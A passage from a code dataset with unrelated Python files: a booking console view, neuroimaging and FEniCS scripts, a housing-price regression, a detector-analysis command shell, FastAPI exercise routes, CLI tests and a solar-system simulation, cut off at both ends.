int(input(\"¿Ver alguna experiencia en específico? (0-No||1-Sí): \"))\n \n if option == 1:\n exp = int(input(\"Ingresa el ID de la experiencia (idExp): \"))\n experiencia = dbexperiencia.searchExperienciaByIdView(exp)\n tablaexp = PrettyTable()\n tablaexp2 = PrettyTable()\n\n tablaexp.field_names = [\"idExp\", \"NombreAnfitrion\", \"TituloExperiencia\", \"TipoDeExperiencia\",\n \"Ubicacion\", \"Descripcion\", \"Idioma\"]\n\n tablaexp2.field_names = [\"PublicoObjetivo\", \"Organizacion\", \"AnfitrionExp\",\n \"ElementosANecesitar\", \"Precio\", \"Fecha\", \"IdTematica\"]\n\n tablaexp.add_row([\n experiencia.id,\n experiencia.host,\n experiencia.ExperienceTitle,\n experiencia.TypeExperience,\n experiencia.Location,\n experiencia.Descrption,\n experiencia.Idiom\n ])\n\n tablaexp2.add_row([\n experiencia.PublicObject,\n experiencia.Organization,\n experiencia.hostExperience,\n experiencia.NeedElements,\n experiencia.precio,\n experiencia.fecha,\n experiencia.tematica\n ])\n\n print(tablaexp)\n tablaexp.clear()\n print(tablaexp2)\n tablaexp2.clear()\n\n registro = int(input(\"Quieres registrarte para esta experiencia? 
(0-No||1-Sí): \"))\n\n if registro == 1:\n befacturas.insertarFacturaExpProceso(exp, cliente.id)\n","sub_path":"Entrega Final/Views/Process_ExpPresenciales.py","file_name":"Process_ExpPresenciales.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"573036944","text":"from fmriprep.workflows import base\nimport os\nfrom niworkflows.nipype.pipeline import engine as pe\nfrom fmriprep.interfaces import BIDSFreeSurferDir\n\n\n\nos.environ['SUBJECTS_DIR'] = '/data/freesurfer'\n\nskull_strip_ants = True\noutput_spaces = ['T1w', 'template', 'fsnative']\ntemplate = 'MNI152NLin2009cAsym'\ndebug = False\nfreesurfer = False\nlongitudinal = False\nomp_nthreads = 10\nhires = True\nreportlets_dir = '/data/reportlets/anat'\noutput_dir = '/data/derivatives/preproc_anat'\noutput_spaces = ['T1w', 'template']\n\nfsdir = pe.Node(BIDSFreeSurferDir(derivatives=output_dir,\n freesurfer_home=os.getenv('FREESURFER_HOME'),\n spaces=output_spaces),\n name='fsdir', run_without_submitting=True)\n\nwf = base.init_single_subject_wf(subject_id='012',\n task_id='binoculardots055',\n name='anatomical_wf',\n ignore=[],\n debug=False,\n anat_only=True,\n longitudinal=False,\n skull_strip_ants=skull_strip_ants,\n reportlets_dir='/data/reportlets/anat',\n output_dir=output_dir,\n bids_dir='/data/sourcedata/',\n freesurfer=freesurfer,\n output_spaces=output_spaces,\n hires=True,\n bold2t1w_dof=12,\n fmap_bspline=False,\n fmap_demean=False,\n use_syn=False,\n force_syn=False,\n output_grid_ref=None,\n use_aroma=False,\n ignore_aroma_err=True,\n omp_nthreads=4,\n template='MNI152NLin2009cAsym')\n\nwf.connect(fsdir, 'subjects_dir', wf.get_node('inputnode'), 'subjects_dir')\n\n\nwf.base_dir = '/data/workflow_folders/'\n\nplugin_settings = {}\nplugin_settings['plugin'] = 'MultiProc'\nplugin_settings['plugin_args'] = {'n_procs': 10}\n\nplugin_settings['plugin'] = 'Linear'\n\n\nwf.write_graph()\nwf.run(**plugin_settings)\n","sub_path":"src/scripts/preproc_anatomical.py","file_name":"preproc_anatomical.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247357865","text":"#!/home/omid/anaconda2/bin/python\n\n#Building a regression model for the Boston housing prices \n\nimport matplotlib.pyplot as plt\nimport random \nfrom sklearn import datasets\nimport numpy as np\n\ndef model(x, b):\n y = b[0]\n for i in range(len(x)):\n y += b[i+1] * x[i] \n #another way to calculate y is: y = x.dot(b) \n return y\n\ndef mean(a): #calculates the mean of a vector (used in normmalization)\n\ts = 0\n\tfor i in range(len(a)):\n\t\ts += a[i]\n\treturn s/len(a)\t\n\ndef rmse_func(preds, targs): \n sum = 0\n n = len(preds)\n for i in range(0, n):\n sum += (preds[i] - targs[i]) ** 2\n return (sum / n) ** 0.5\n\n#the following function shuffles the input matrix a and the vector b\ndef shuffle_func(a, b):\n random_index = random.sample(range(len(b)), len(b))\n random_index = np.array(random_index)\n a = a[random_index, :]\n b = b[random_index]\n return (a, b)\n\n#this function normalizes the dataset by subtracting the mean of features and \n#dividing by their range, after this all features will have mean 0. 
\ndef normalize(d): \n d_normal = np.zeros(shape=d.shape)\n for i in range(d.shape[1]):\n d_normal[:, i] = (d[:, i] - mean(d[:, i]))/(max(d[:, i]) - min(d[:, i])) \n return d_normal\n\n#function to normalize targets\ndef normalize_target(t):\n t_normal = np.zeros(shape=t.shape)\n for i in range(len(t)):\n t_normal[i] = (t[i] - mean(t))/(max(t) - min(t))\n return t_normal\n\n#loading the Boston dataset \nboston = datasets.load_boston()\ndata = boston.data\ndata = normalize(data)\ntarget = boston.target\ntarget = normalize_target(target)\nn = data.shape[0]\nn_training = int(n * 0.9) #90% of the data will be used for training\nn_features = boston.feature_names.shape[0]\n\n#defining training and test sets from feature and target vectors\n#shuffle the data first to make sure we will have an unbiased and random subset\n(data, target) = shuffle_func(data, target)\n#subsetting the np array to get n_training rows:\ntrainingX = data[0 : n_training, :] \ntestX = data[n_training: , :]\n#same for y ...\ntrainingY = target[0: n_training]\ntestY = target[n_training: ]\nn_test = testX.shape[0]\n\n#defining the learning rates list to use in the algorithm \nlearning_rates = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1]\n\n#rmse dictionary to store rmse lists, it uses learning rates as dictionary keys\nrmse_dict = {}\n\nfor learning_rate in learning_rates:\n # set up our initial values \n max_epochs = 10\n b = np.zeros(n_features + 1)\n current_epoch = 0\n rmse_list = np.array([])\n \n while(current_epoch < max_epochs):\n #shuffling data - shuffling can be turned off by commenting this line\n (trainingX, trainingY) = shuffle_func(trainingX, trainingY)\n #this loop takes us through one epoch of learning \n for i in range(0, n_training):\n x = trainingX[i,:] #this is one row of data\n y = trainingY[i] \n #compute the error for this data point\n error = model(x, b) - y\n #adjust the coefficients:\n b[0] = b[0] - learning_rate * error\n for i in range(0, len(x)):\n b[i+1]= b[i+1] - learning_rate*error*x[i]\n #incrementing epoch\n current_epoch += 1\n #calculating predictions \n predictions = np.array([])\n for i in range(0, n_test):\n x = testX[i,:]\n prediction = model(x, b)\n predictions = np.append(predictions, prediction)\n #calculating rmse\n rmse = rmse_func(predictions, testY)\n rmse_list = np.append(rmse_list, rmse)\n \n #this dictionary holds the rmse values (as a list) for each learning_rate\n rmse_dict[learning_rate] = rmse_list\n\n\n#plotting \np = 1\nfor learning_rate in learning_rates:\n plt.figure(p)\n title = \"RMSE values with learning rate %f\" %(learning_rate)\n fig_name = \"Question1 %f.png\" %(learning_rate)\n plt.title(title, fontsize=8)\n plt.plot(range(0, max_epochs), rmse_dict[learning_rate])\n plt.xticks(range(0, max_epochs))\n plt.xlabel(\"epoch\", fontsize=8)\n plt.ylabel(\"RMSE\", fontsize=8)\n plt.savefig(fig_name)\n p += 1\nplt.show() \n\n\n\n\n","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"228003200","text":"import argparse\nclass Options:\n def __init__(self, description, con):\n self.parser = argparse.ArgumentParser(description=description)\n\n self.add(name=con.title['name'], _type=con.title['type'], _default=con.title['default'], _help=con.title['help'])\n self.add(name=con.method['name'], _type=con.method['type'], 
_default=con.method['default'], _help=con.method['help'])\n self.add(name=con.dataset['name'], _type=con.dataset['type'], _default=con.dataset['default'], _help=con.dataset['help'])\n self.add(name=con.random_seed['name'], _type=con.random_seed['type'], _default=con.random_seed['default'], _help=con.random_seed['help'])\n self.add(name=con.avoid_skewness['name'], _type=con.avoid_skewness['type'], _default=con.avoid_skewness['default'], _help=con.avoid_skewness['help'])\n self.add(name=con.KFold['name'], _type=con.KFold['type'], _default=con.KFold['default'], _help=con.KFold['help'])\n self.add(name=con.print_details['name'], _type=con.print_details['type'], _default=con.print_details['default'], _help=con.print_details['help'])\n self.add(name=con.show_fitting['name'], _type=con.show_fitting['type'], _default=con.show_fitting['default'], _help=con.show_fitting['help'])\n \n self.add(name=con.data_folder['name'], _type=con.data_folder['type'], _default=con.data_folder['default'], _help=con.data_folder['help'])\n self.add(name=con.data_method['name'], _type=con.data_method['type'], _default=con.data_method['default'], _help=con.data_method['help'])\n self.add(name=con.predict_label['name'], _type=con.predict_label['type'], _default=con.predict_label['default'], _help=con.predict_label['help'])\n self.add(name=con.predict_method['name'], _type=con.predict_method['type'], _default=con.predict_method['default'], _help=con.predict_method['help'])\n\n def add(self, name, _type, _default, _help):\n self.parser.add_argument(\n '--'+name, \n type=_type, \n default=_default, \n help=_help)\n\n def parse(self):\n self.args = self.parser.parse_args()\n self.args_dict = vars(self.args) #args as a dict, for printing purposes","sub_path":"_class/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314098255","text":"f = open(\"input.txt\")\r\nw = open(\"output.txt\", 'w')\r\nline = f.readline().split()\r\nn_condition, m_condition = [int(i) for i in line]\r\nadj_list = [[] for i in range(n_condition)]\r\nfor i in range(m_condition):\r\n line = f.readline().split()\r\n a, b = [int(j) for j in line]\r\n adj_list[a - 1].append(b)\r\n adj_list[b - 1].append(a)\r\nfor i in range(n_condition):\r\n w.write(str(len(adj_list[i])) + ' ')\r\n for j in range(len(adj_list[i])):\r\n w.write(str(adj_list[i][j]) + ' ')\r\n w.write('\\n')\r\n","sub_path":"grafs/adjacency_list.py","file_name":"adjacency_list.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525810548","text":"'''\ncommandline oriented interface using the cmd module for the beta-scope analysis\n'''\n\nimport readline\nreadline.get_completer_delims()\n#readline.set_completer_delims(' \\t\\n;')\n\nimport glob\nimport os\nimport sys\nimport cmd\nimport subprocess\nimport threading\nimport multiprocessing as mp\nfrom colorStringFormating import *\n\npredefined_path = {\n\"__raw\":\"/media/mnt/BigHD/Beta_DAQ_Data/\",\n\"__yuzhan\":\"/media/mnt/BigHD/BetaScope_Data/Analyzed_YZ/\",\n\"__simone\":\"/media/mnt/BigHD/BetaScope_Data/Analyzed_Simone/\"\n}\n\nclass Lgad(cmd.Cmd, object):\n\n intro = colorString.colorFormat(\" Interface for beta-scope analysis\", \"cyan\")\n prompt = colorString.colorFormat(\"(LGAD) \", \"yellow\")\n\n global predefined_path\n\n def __init__(self):\n self.raw_dir = predefined_path[\"__raw\"]\n self.files = 
os.listdir(os.getcwd())\n cmd.Cmd.__init__(self)\n\n def cmdloop(self, intro=None):\n print(self.intro)\n while True:\n try:\n super(Lgad, self).cmdloop(intro=\"\")\n except KeyboardInterrupt:\n colorString.sysError(\"You have pressed ctrl+C! Do you want to exit? (press again to exit)\" )\n raw_input()\n\n def completedefault(self, text, line, begidx, endidx):\n return [i for i in self.files if i.startswith(text)]\n\n def emptyline(self):\n pass\n\n def do_cd(self, tdir):\n \"change directory, similar to the usual cd on the command line.\"\n #glob.glob(os.path.expanduser(str(tdir)+\"*\"))\n #os.path.expanduser(tdir)\n if tdir:\n pass\n else:\n tdir = \".\"\n if \"~\" in tdir:\n tdir = os.path.expanduser(\"~\") + tdir.split(\"~\")[1]\n self.files = os.listdir(os.getcwd())\n\n if tdir in predefined_path:\n tdir = predefined_path[tdir]\n self.files = os.listdir(os.getcwd())\n\n try:\n os.chdir(tdir)\n colorString.sysMsg(\"changed dir to {}\".format(tdir) )\n self.files = os.listdir(os.getcwd())\n except OSError:\n print(colorString.colorFormat(\"Cannot find {}\".format(tdir), \"red\"))\n\n #'''\n def default(self, line):\n subprocess.call(line, shell=True)\n #'''\n\n '''\n def do_pwd(self, tdir=\"\"):\n print( os.getcwd() )\n '''\n\n def do_set_output_dir(self, path ):\n \"Set up the stats file output directory. If you have a predefined path, you can use it. \"\n if path in predefined_path:\n self.output_dir = predefined_path[path]\n colorString.sysMsg(\"output path is set to {}\".format(self.output_dir) )\n else:\n try:\n self.output_dir = path\n colorString.sysMsg(\"output path is set to {}\".format(self.output_dir) )\n except:\n colorString.sysError(\"cannot set output path to {}\".format(self.output_dir) )\n\n\n def do_set_run( self, runNum):\n \"Set up a run for analysis. It will automatically search for the run number in the pre-defined raw data directory. If it finds the run number, it will create a folder for the run in your output directory\"\n if hasattr(self, \"output_dir\"):\n if self.output_dir:\n pass\n else:\n colorString.sysError(\"output directory has not been set. Please run set_output_dir\" )\n else:\n colorString.sysError(\"output directory has not been set. Please run set_output_dir\" )
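\n # Scan the raw-data directory for a folder whose name contains \"Sr_Run<runNum>\";\n # the last match found becomes this session's run folder.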
\n\n for d in os.listdir( self.raw_dir ):\n if \"Sr_Run\"+str( runNum ) in d:\n self.runNum = runNum\n self.runNum_dir = d\n\n\n if hasattr(self, \"runNum\"):\n if not os.path.isdir(self.output_dir + \"/\" + self.runNum_dir):\n os.mkdir( self.output_dir + \"/\" + self.runNum_dir )\n self.current_run = self.output_dir + \"/\" + self.runNum_dir\n else:\n self.current_run = self.output_dir + \"/\" + self.runNum_dir\n colorString.sysError(\"directory {} is already there\".format(self.current_run) )\n else:\n colorString.sysError(\"No run number {}\".format(runNum) )\n\n def do_cd_current_run(self, tdir=\"\"):\n \"change directory to the run you set from set_run\"\n self.do_cd( self.current_run )\n\n\n def do_generate_config(self, place_holder=\"\"):\n \"Generate configuration file for the beta-scope waveform analyzer.\"\n subprocess.call(\"${BETASCOPE_SCRIPTS}/../BetaScope_Ana/BetaScopeWaveformAna/bin/GenerateWaveformConfig\", shell=True)\n\n def do_set_default_config(self, place_holder=\"\"):\n \"Set the configuration file to default for beta-scope waveform analyzer\"\n import configparser\n\n global predefined_path\n\n __raw_data_dir = self.raw_dir\n __data_output_dir = self.current_run\n __runNum = self.runNum\n\n parser = configparser.ConfigParser()\n parser.optionxform = str\n parser.read(\"WaveformAnaConfig.ini\")\n parser.set(\"General\",\"rawFilesDir\", \"{raw_dir}/{raw_data}/fromDAQ/\".format(raw_dir=__raw_data_dir, raw_data=self.runNum_dir) )\n parser.set(\"Channel_Activation\", \"channel_2\", \"1\")\n parser.set(\"Channel_Activation\", \"channel_3\", \"1\")\n parser.set(\"Channel_Invertion\", \"channel_2\", \"1\")\n with open(\"WaveformAnaConfig.ini\", \"wb\") as config:\n parser.write(config)\n\n def do_set_active_channel(self, ch):\n import configparser\n parser = configparser.ConfigParser()\n parser.optionxform = str\n parser.read(\"WaveformAnaConfig.ini\") # read the existing config first so its other settings are kept\n parser.set(\"Channel_Activation\", \"channel_{ch}\".format(ch=ch), \"1\")\n with open(\"WaveformAnaConfig.ini\", \"wb\") as config:\n parser.write(config)\n\n\n def do_show_ana_progress(self, opt=\"\"):\n if \"persist\" in opt:\n os.system(\"watch --color tail $BETASCOPE_SCRIPTS/nohup.log\")\n else:\n os.system(\"tail $BETASCOPE_SCRIPTS/nohup.log\")\n\n def do_auto_cut( self, run=\"\" ):\n if not hasattr(self,\"current_run\"):\n if not run:\n print(\"please specify a run number\")\n return -1\n else:\n self.do_set_run(run)\n self.do_cd_current_run()\n p = subprocess.call(\"python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num}\".format(num=self.runNum), shell=True)\n else:\n self.do_cd_current_run()\n p = subprocess.call(\"python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num}\".format(num=self.runNum), shell=True)\n\n def do_run_analysis(self, mode=\"\"):\n \"Run routine beta-scope analysis. Argument with 'full' will do the full routine analysis, else it will only generate stats files. 
Argument with 'nohup' will suppress the output \"\n if not hasattr(self, \"current_run\"):\n colorString.sysError(\"current run is not set\" )\n\n else:\n self.do_cd_current_run()\n\n if \"nohup\" in mode:\n nohup = \"nohup\"\n nohup_log = \" >> $BETASCOPE_SCRIPTS/nohup.log\"\n\n def isRunning(pid):\n while True:\n if os.path.isdir(\"/proc/{}\".format(pid)):\n continue\n else:\n break\n\n else:\n nohup = \"\"\n nohup_log = \"\"\n\n if not nohup:\n p = subprocess.Popen(\"{nohup} $BETASCOPE_SCRIPTS/../BetaScope_Ana/BetaScopeWaveformAna/bin/Run_WaveformAna {tdir}/WaveformAnaConfig.ini --skipWaveform {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log, tdir=self.current_run), shell=True)\n p.wait()\n\n if \"full\" in mode:\n p = subprocess.Popen(\"{} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GenerateDataProcessorConfig.exe {}\".format(nohup, nohup_log), shell=True)\n p.wait()\n\n p = subprocess.call(\"{nohup} python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num} {nohup_log}\".format(num=self.runNum, nohup=nohup, nohup_log=nohup_log), shell=True)\n\n p = subprocess.Popen(\"{nohup} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GetResults.exe run_info_v08022018.ini {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log), shell=True)\n p.wait()\n else:\n def nohupRun(mode):\n p = subprocess.Popen(\"{nohup} $BETASCOPE_SCRIPTS/../BetaScope_Ana/BetaScopeWaveformAna/bin/Run_WaveformAna {tdir}/WaveformAnaConfig.ini --skipWaveform {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log, tdir=self.current_run), shell=True)\n #pid = p.pid\n #isRunning(pid)\n p.wait()\n if \"full\" in mode:\n p = subprocess.Popen(\"{} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GenerateDataProcessorConfig.exe {}\".format(nohup, nohup_log), shell=True)\n #pid = p.pid\n #isRunning(pid)\n p.wait()\n\n p = subprocess.call(\"{nohup} python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num} {nohup_log}\".format(num=self.runNum, nohup=nohup, nohup_log=nohup_log), shell=True)\n\n p = subprocess.Popen(\"{nohup} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GetResults.exe run_info_v08022018.ini {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log), shell=True)\n p.wait()\n\n #job = threading.Thread(name=\"nohupRun\", target=nohupRun, args=(mode,) )\n job = mp.Process(target=nohupRun, args=(mode,) )\n job.daemon = True\n job.start()\n\n\nif __name__ == \"__main__\":\n interface = Lgad()\n interface.cmdloop()\n","sub_path":"scripts/lgad.py","file_name":"lgad.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"399018898","text":"# coding: utf-8\n# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department\n# Distributed under the terms of \"New BSD License\", see the LICENSE file.\n\nfrom fenics import *\n\n\ndef poisson_nonlinear():\n # Warning: from fenics import * will import both `sym` and\n # `q` from FEniCS. 
We therefore import FEniCS first and then\n # overwrite these objects.\n\n def q(u):\n \"Return nonlinear coefficient\"\n return 1 + u ** 2\n\n # Use SymPy to compute f from the manufactured solution u\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x + 2 * y\n f = - sym.diff(q(u) * sym.diff(u, x), x) - sym.diff(q(u) * sym.diff(u, y), y)\n f = sym.simplify(f)\n u_code = sym.printing.ccode(u)\n f_code = sym.printing.ccode(f)\n # print('u =', u_code)\n # print('f =', f_code)\n\n # Create mesh and define function space\n mesh = UnitSquareMesh(8, 8)\n V = FunctionSpace(mesh, 'P', 1)\n\n # Define boundary condition\n u_D = Expression(u_code, degree=2)\n\n def boundary(x, on_boundary):\n return on_boundary\n\n bc = DirichletBC(V, u_D, boundary)\n\n # Define variational problem\n u = Function(V) # Note: not TrialFunction!\n v = TestFunction(V)\n f = Expression(f_code, degree=2)\n F = q(u) * dot(grad(u), grad(v)) * dx - f * v * dx\n\n # Compute solution\n solve(F == 0, u, bc)\n\n # # Plot solution\n # plot(u)\n\n # # Compute maximum error at vertices. This computation illustrates\n # # an alternative to using compute_vertex_values as in poisson.py.\n # u_e = interpolate(u_D, V)\n # import numpy as np\n # error_max = np.abs(u_e.vector().array() - u.vector().array()).max()\n # print('error_max = ', error_max)\n\n # # Hold plot\n # interactive()\n\n return u.compute_vertex_values(mesh)\n","sub_path":"tests_integration/continuum/fenics/tutorials/page_8.py","file_name":"page_8.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453227893","text":"import mock\nimport pytest\nimport env\nimport click\nfrom click.testing import CliRunner\nfrom tests.factories import factory\nfrom personalwebpageapi.cli import cli\nfrom personalwebpageapi.models.auth import Auth\n\n\n@pytest.fixture\ndef runner():\n return CliRunner()\n\n\n@mock.patch('flask.Flask.run')\ndef test_cli_dev_command_without_command(mocker, runner):\n mocker.return_value = None\n\n env.APP_ENV = 'dev'\n result = runner.invoke(cli)\n\n assert result.exit_code == 0\n mocker.assert_called_once()\n\n\n@mock.patch('waitress.serve')\ndef test_cli_prod_command_without_command(mocker, runner):\n mocker.return_value = None\n\n env.APP_ENV = 'prod'\n result = runner.invoke(cli)\n\n assert result.exit_code == 0\n mocker.assert_called_once()\n\n\ndef test_cli_token_command_without_params(runner):\n result = runner.invoke(cli, ['token'])\n assert 'Error: no option provided' in result.output\n\n\ndef test_cli_token_list(runner):\n factory(Auth).create(token='token_1')\n factory(Auth).create(token='token_2')\n\n result = runner.invoke(cli, ['token', '-l'])\n\n assert result.exit_code == 0\n assert result.output == 'token_1\\ntoken_2\\n'\n\n\n@mock.patch('personalwebpageapi.cli.token_generator')\ndef test_cli_token_create(mocker, runner):\n mocker.return_value = 'test_token'\n\n result = runner.invoke(cli, ['token', '-c'])\n auth_token = Auth.where('token', 'test_token').get()\n\n assert auth_token\n mocker.assert_called_with(100)\n","sub_path":"tests/cli/test_cli_commands.py","file_name":"test_cli_commands.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"505439807","text":"from typing import List\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom src import config\nfrom src.schemas import 
schemas\nfrom src.api import crud\nfrom src.database import database\nfrom src.utils import enums\n\nrouter = APIRouter(\n prefix=\"/api\",\n tags=[\"Exercises\"],\n)\n\n@router.get(\"/exercises\", response_model=List[schemas.Exercise])\nasync def get_exercises(skip: int = 0, limit: int = 100, db: Session = Depends(database.get_db)):\n exercises = crud.get_exercises(db, skip=skip, limit=limit)\n return exercises\n\n@router.post(\"/exercises\", response_model=schemas.ExerciseCreate)\nasync def create_exercise(exercise: schemas.ExerciseCreate, db: Session = Depends(database.get_db)):\n return crud.add_exercise(db=db, exercise=exercise)\n\n@router.get(\"/exercises/{exercise_id}\", response_model=schemas.Exercise)\nasync def get_exercise(exercise_id: int, db: Session = Depends(database.get_db)):\n response = crud.get_exercise(db=db, exercise_id=exercise_id)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n@router.get(\"/types/{exercise_type}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_type(exercise_type: enums.TypeEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_type(db=db, exercise_type=exercise_type)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n\n@router.get(\"/muscles/{exercise_muscle}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_muscle(exercise_muscle: enums.MuscleEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_muscle(db=db, exercise_muscle=exercise_muscle)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n@router.get(\"/equipment/{exercise_equipment}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_equipment(exercise_equipment: enums.EquipmentEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_equipment(db=db, exercise_equipment=exercise_equipment)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Equipment not found\")\n return response\n","sub_path":"src/routes/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497715755","text":"# Solar system\n# Python script created by Daniel Sanaee\n# 2021-01.16\nimport sys\nfor p in sys.path:\n print(p)\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\ndef main():\n\n class solarsystem_object():\n \"\"\"The solarsystem\"\"\"\n def __init__(self):\n self._size = 0\n self.time = 0\n self.data = {}\n\n def simulation_parameters(self):\n \"\"\"Add simulation time parameters\"\"\"\n self.time = None\n self.hour_step = None\n self.years = None\n self.dt = None\n self.steps = None\n\n def add_sun(self):\n \"\"\"Add sun to solarsystem\"\"\"\n self._size += 1\n self.sun = _round_object()\n self.sun.name = \"sun\"\n self.data[\"sun\"] = [333000, 109, 0, 0, 0, 0, \"#f7dc6f\"]\n\n def add_mercury(self):\n \"\"\"Add mercury to solarsystem\"\"\"\n self._size += 1\n self.mercury = _round_object()\n self.mercury.name = \"mercury\"\n self.data[\"mercury\"] = [0.055, 0.3829, 0.387, 0, 0, (47.362/29.78)*(2*math.pi), \"#b2babb\"]\n\n def add_venus(self):\n \"\"\"Add venus to solarsystem\"\"\"\n self._size += 1\n self.venus = _round_object()\n self.venus.name = \"venus\"\n self.data[\"venus\"] = [0.815, 0.95, 0.72, 0, 0, 
(35.02/29.78)*(2*math.pi), \"#f9e79f\"]\n\n def add_earth(self):\n \"\"\"Add earth to solarsystem\"\"\"\n self._size += 1\n self.earth = _round_object()\n self.earth.name = \"earth\"\n self.data[\"earth\"] = [1, 1, 1, 0, 0, 2*math.pi, \"#3498db\"]\n\n def add_mars(self):\n \"\"\"Add mars to solarsystem\"\"\"\n self._size += 1\n self.mars = _round_object()\n self.mars.name = \"mars\"\n self.data[\"mars\"] = [0.107, 0.53, 1.52, 0, 0, (24.097/29.78)*(2*math.pi), \"red\"]\n\n def add_jupiter(self):\n \"\"\"Add jupiter to solarsystem\"\"\"\n self._size += 1\n self.jupiter = _round_object()\n self.jupiter.name = \"jupiter\"\n self.data[\"jupiter\"] = [318, 10.97, 5.2, 0, 0, (13.07/29.78)*(2*math.pi), \"#f0b27a\"]\n\n def add_saturn(self):\n \"\"\"Add saturn to solarsystem\"\"\"\n self._size += 1\n self.saturn = _round_object()\n self.saturn.name = \"saturn\"\n self.data[\"saturn\"] = [95.159, 58232/6371, 9.58, 0, 0, (9.68/29.78)*(2*math.pi), \"#af601a\"]\n\n def add_uranus(self):\n \"\"\"Add uranus to solarsystem\"\"\"\n self._size += 1\n self.uranus = _round_object()\n self.uranus.name = \"uranus\"\n self.data[\"uranus\"] = [14.536, 4, 19.21, 0, 0, (6.8/29.78)*(2*math.pi), \"#85c1e9\"]\n\n def add_neptune(self):\n \"\"\"Add neptune to solarsystem\"\"\"\n self._size += 1\n self.neptune = _round_object()\n self.neptune.name = \"neptune\"\n self.data[\"neptune\"] = [17.147, 24622/6371, 30.07, 0, 0, (5.43/29.78)*(2*math.pi), \"#1f618d\"]\n\n def add_asteroid(self):\n \"\"\"Add asteroid to solarsystem\"\"\"\n self._size += 1\n self.asteroid = _round_object()\n self.asteroid.name = \"asteroid\"\n self.data[\"asteroid\"] = [0.01, 1, 0.74854, -12.004, 0, 4*math.pi, \"#b2babb\"]\n\n def get_size(self):\n return self._size\n\n def healthy(self):\n \"\"\"Unit testing\"\"\"\n assert self._size >= 0\n #Assert mass and radius > 0\n\n class _round_object(solarsystem_object):\n \"\"\"Create a round object used for planets, stars and asteroids\"\"\"\n def __init__(self):\n\n self.mass = None\n self.radius = None\n self.name = \"None\"\n self.colour = \"None\"\n\n self.xposition = 0\n self.yposition = 0\n self.xspeed = 0\n self.yspeed = 0\n self.xacceleration = 0\n self.yacceleration = 0\n\n self.xposition_list = []\n self.yposition_list = []\n self.xspeed_list = []\n self.yspeed_list = []\n self.xacceleration_list = []\n self.yacceleration_list = []\n\n self.total_energy_list = []\n self.potential_energy_list = []\n self.kinetic_energy_list = []\n\n\n def create_solarsystem(body_list=None):\n \"\"\"Create solarsystem object with planets\"\"\"\n\n solarsystem = solarsystem_object()\n\n # for bodyindex in range(len(solarsystem.data)):\n # print(\"Index number\", bodyindex)\n # solarsystem.add_body(bodyindex)\n\n if body_list == None: body_list = [\"sun\", \"mercury\", \"venus\", \"earth\", \"mars\", \"jupiter\", \"saturn\", \"uranus\", \"neptune\", \"asteroid\"]\n\n for body in body_list:\n if body == \"sun\":\n solarsystem.add_sun()\n elif body == \"mercury\":\n solarsystem.add_mercury()\n elif body == \"venus\":\n solarsystem.add_venus()\n elif body == \"earth\":\n solarsystem.add_earth()\n elif body == \"mars\":\n solarsystem.add_mars()\n elif body == \"jupiter\":\n solarsystem.add_jupiter()\n elif body == \"saturn\":\n solarsystem.add_saturn()\n elif body == \"uranus\":\n solarsystem.add_uranus()\n elif body == \"neptune\":\n solarsystem.add_neptune()\n elif body == \"asteroid\":\n solarsystem.add_asteroid()\n\n getattr(solarsystem, str(body)).mass = solarsystem.data[body][0] # --> solarsystem.sun.mass = 
